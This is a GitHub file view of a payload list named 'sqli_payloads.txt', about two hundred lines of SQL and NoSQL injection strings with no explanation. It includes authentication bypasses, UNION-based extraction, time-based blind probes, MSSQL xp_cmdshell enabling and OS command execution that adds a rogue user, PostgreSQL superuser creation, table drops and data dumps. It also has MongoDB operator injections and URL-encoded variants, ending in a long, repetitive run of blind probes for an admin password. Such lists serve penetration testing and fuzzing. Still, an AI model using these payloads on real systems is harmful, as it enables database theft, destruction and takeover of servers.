-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsqli_payloads.txt
203 lines (203 loc) · 17.8 KB
/
sqli_payloads.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
') OR ('1'='1
' OR 1=1--
' OR 1=1#
' OR 1=1/*
') OR '1'='1'--
') OR '1'='1'(#)
') OR '1'='1'/*
"" OR 1=1--
" OR "" = "
OR 1=1
OR 1=0
AND 1=1
AND 1=0
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%')
' OR EXISTS(SELECT 1 FROM dual WHERE table_name = 'tablename')
' OR EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema = 'dbname' AND table_name = 'tabname')
' OR (SELECT user FROM mysql.user LIMIT 1)='root'
' OR 'x'='x
' OR 1=1--
'; EXEC xp_cmdshell('dir')--
'; DROP TABLE users--
'; UPDATE account SET balance = 10000 WHERE name = 'Bob'--
' OR EXISTS(SELECT * FROM master..sysdatabases)--
' OR EXISTS(SELECT * FROM sys.objects)--
' OR EXISTS(SELECT * FROM sys.columns WHERE object_id = OBJECT_ID('users'))--
'; WAITFOR DELAY '00:00:05'--
'; BEGIN TRAN; UPDATE account SET balance = balance + 1000; COMMIT TRAN; --
'; DECLARE @cmd sysname; SET @cmd = 'cmdshell'; EXEC sp_configure @cmd,1; RECONFIGURE;--
'; DECLARE @cmd varchar(4000); SET @cmd = 'net user'; EXEC xp_cmdshell @cmd;--
' AND 1=(SELECT COUNT(*) FROM tablenames); --
' AND 1=(SELECT TOP 1 column_name FROM table_name); --
' AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116; --
1; WAITFOR DELAY '0:0:5'--
1; EXEC sp_msforeachtable 'DROP TABLE ?'--
'; IF (1=1) WAITFOR DELAY '00:00:05'--
'; DECLARE @s varchar(8000); SET @s = CAST(0xDEC0DED AS varchar(4000)); EXEC(@s)--
1; EXEC xp_cmdshell('net user eviluser evilpass /ADD')--
' OR '1'='1
' OR 1=1--
' OR 1=1#
' OR 1=1/*
') OR '1'='1'--
') OR '1'='1'(#)
') OR '1'='1'/*
"" OR 1=1--
" OR "" = "
OR 1=1
OR 1=0
AND 1=1
AND 1=0
' OR EXISTS(SELECT 1 FROM pg_sleep(5))--
' OR EXISTS(SELECT 1 FROM pg_database WHERE datname LIKE '%')--
' OR pg_sleep(10)--
' OR (SELECT current_setting('is_superuser'))='on'
'; DROP TABLE IF EXISTS users;--
'; CREATE USER hacker WITH SUPERUSER PASSWORD 'evil';--
'; COPY (SELECT * FROM sensitive_table) TO '/tmp/sensitive_data.csv' WITH CSV;--
{'$gt': ''}
{'$ne': null}
{username: {'$ne': null}, password: {'$ne': null}}
{username: {'$regex': '.*'}, password: {'$regex': '.*'}}
'; this.db.dropDatabase();
{$where: '1 == 1'}
{$where: 'return true;'}
{$where: 'function() {return true;}'}
'; return db.adminCommand('listDatabases');
{$where: 'function() {sleep(5000); return true;}'}
{password: {$regex: "^admin"}}
{username: {$regex: ".*"}, password: {$regex: ".*"}}
{username: {$gt: undefined}, password: {$gt: undefined}}
'; db.dropUser("username");
'; db.serverStatus();
'; while(true){}
{username: {$gt: ''}, password: {$gt: ''}}
{username: {$ne: 'nonexistentuser'}, password: {$ne: 'wrongpassword'}}
{$eval: 'db.dropDatabase()'}
{$jsonSchema: {required: ["none"]}}
%27%20OR%20%271%27%3D%271
%27%20OR%20%271%27%3D%272%20--%20
%27%20OR%20%271%27%3D%271%20--%20
%27%20OR%201%3D1%20--%20
%27%29%20OR%20%28%271%27%3D%271
%22%20OR%20%221%22%3D%221
%22%20OR%20%221%22%3D%222%20--%20
%22%20OR%20%221%22%3D%221%20--%20
%22%20OR%201%3D1%20--%20
%22%29%20OR%20%28%221%22%3D%221
UNION%20SELECT%201%2C2%2C3
UNION%20ALL%20SELECT%201%2C2%2C3
%27%20UNION%20SELECT%201%2C2%2C3%20--%20
%22%20UNION%20SELECT%201%2C2%2C3%20--%20
%27%20UNION%20ALL%20SELECT%201%2C2%2C3%20--%20
%22%20UNION%20ALL%20SELECT%201%2C2%2C3%20--%20
SELECT%20*%20FROM%20users%20WHERE%20id%3D%271%27
SELECT%20*%20FROM%20users%20WHERE%20id%3D%271%27%20--
SELECT%20*%20FROM%20users%20WHERE%20id%3D%271%27%20%20%23
SELECT%20username%2Cpassword%20FROM%20users
INSERT%20INTO%20users%20%28username%2Cpassword%29%20VALUES%20%28%27newuser%27%2C%20%27newpass%27%29
UPDATE%20users%20SET%20password%3D%27newpass%27%20WHERE%20username%3D%27admin%27
DELETE%20FROM%20users
DROP%20TABLE%20users
%27%20OR%20%271%27%3D%271%3B%20DROP%20TABLE%20users%20--%20
%27%3B%20SHUTDOWN%20--%20
%27%3B%20REVOKE%20ALL%20PRIVILEGES%20--%20
%27%20OR%20EXISTS%28SELECT%20*%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%3D%27password%27%29%20--%20
%27%3B%20EXEC%20xp_cmdshell%28%27dir%27%29%20--%20
%27%3B%20EXEC%20sp_configure%20%27xp_cmdshell%27%2C%201%3B%20RECONFIGURE%20--%20
%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20
%27%3B%20SELECT%20*%20FROM%20OPENROWSET%28%27SQLOLEDB%27%2C%20%27server%3Dlocalhost%3Buid%3Dsa%3Bpwd%3Dpassword%27%2C%20%27SELECT%20*%20FROM%20database.dbo.table%27%29%20--%20
%27%20AND%201%3DCAST%280x5%20AS%20INT%29%20--%20
%27%20AND%201%3DCAST%280x5%20AS%20INT%29%20AND%20%27%27%3D%27
%27%20AND%20ASCII%28LOWER%28SUBSTRING%28%28SELECT%20TOP%201%20name%20FROM%20sysobjects%20WHERE%20xtype%3D%27U%27%20AND%20name%20NOT%20IN%20%28SELECT%20TOP%201%20name%20FROM%20sysobjects%20WHERE%20xtype%3D%27U%27%20ORDER%20BY%20name%29%20ORDER%20BY%20name%20DESC%29%2C1%2C1%29%29%29%3D109%20--%20
%27%3B%20SELECT%20CASE%20WHEN%20%28ASCII%28LOWER%28SUBSTRING%28%28SELECT%20TOP%201%20name%20FROM%20sysobjects%20WHERE%20xtype%3D%27U%27%20AND%20name%20NOT%20IN%20%28SELECT%20TOP%201%20name%20FROM%20sysobjects%20WHERE%20xtype%3D%27U%27%20ORDER%20BY%20name%29%20ORDER%20BY%20name%20DESC%29%2C1%2C1%29%29%29%3D109%20THEN%20%27True%27%20ELSE%20%27False%27%20END%20--%20
%27%3B%20DECLARE%20@T%20TABLE%28ID%20INT%29%3B%20INSERT%20INTO%20@T%20EXEC%20sp_helpdb%3B%20SELECT%20*%20FROM%20@T%20--%20
%27%20AND%201%3D1%20AND%20%27%27%3D%28SELECT%20TOP%201%20COLUMN_NAME%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%3D%27users%27%20AND%20COLUMN_NAME%3D%27password%27%29%20--%20
%27%20AND%201%3D2%20UNION%20ALL%20SELECT%201%2CNULL%2C%27Password%3A%20%27%2Bpassword%20FROM%20users%20WHERE%20username%3D%27admin%27%20--%20
%27%20AND%201%3D1%20UNION%20SELECT%20NULL%2C%27%27%2C%27%27%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%201%3D1%20--%20
%27%3B%20BEGIN%20TRAN%3B%20DELETE%20FROM%20users%3B%20COMMIT%3B%20--%20
%27%3B%20BEGIN%20TRAN%3B%20UPDATE%20users%20SET%20password%3D%27password123%27%20WHERE%20username%3D%27admin%27%3B%20COMMIT%3B%20--%20
%27%3B%20BEGIN%20TRAN%3B%20INSERT%20INTO%20users%20%28username%2Cpassword%29%20VALUES%20%28%27newuser%27%2C%20%27newpass%27%29%3B%20COMMIT%3B%20--%20
%27%3B%20BEGIN%20TRAN%3B%20SELECT%20*%20FROM%20users%3B%20ROLLBACK%3B%20--%20
%27%3B%20BEGIN%20TRAN%3B%20SELECT%20*%20FROM%20users%20WHERE%20username%3D%27admin%27%3B%20COMMIT%3B%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20TOP%201%20password%20FROM%20users%20WHERE%20username%3D%27admin%27%29%20IS%20NOT%20NULL%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20password%20FROM%20users%20WHERE%20username%3D%27admin%27%29%20LIKE%20%27%25pass%25%27%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20password%20FROM%20users%20WHERE%20username%3D%27admin%27%29%20LIKE%20%27pass%25%27%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20password%20FROM%20users%20WHERE%20username%3D%27admin%27%29%20LIKE%20%27%25pass%27%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20password%20FROM%20users%20WHERE%20username%3D%27admin%27%29%20NOT%20LIKE%20%27%25pass%25%27%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20password%20FROM%20users%20WHERE%20username%3D%27admin%27%29%20NOT%20LIKE%20%27pass%25%27%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20password%20FROM%20users%20WHERE%20username%3D%27admin%27%29%20NOT%20LIKE%20%27%25pass%27%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20username%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%25pass%25%27%29%20IS%20NOT%20NULL%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20username%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27pass%25%27%29%20IS%20NOT%20NULL%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20username%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%25pass%27%29%20IS%20NOT%20NULL%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20username%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%25pass%25%27%29%20IS%20NOT%20NULL%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20username%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27pass%25%27%29%20IS%20NOT%20NULL%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20username%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%25pass%27%29%20IS%20NOT%20NULL%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%3D%27password%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%3D%27password%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%25pass%25%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27pass%25%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%25pass%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%25pass%25%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27pass%25%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%25pass%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20IS%20NULL%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20IS%20NOT%20NULL%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%3D%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%3D%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20NOT%20LIKE%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20%3D%20%27%27%29%20%3D%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3E%200%20--%20
%27%20AND%201%3D1%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20password%20LIKE%20%27%27%29%20%3D%200%20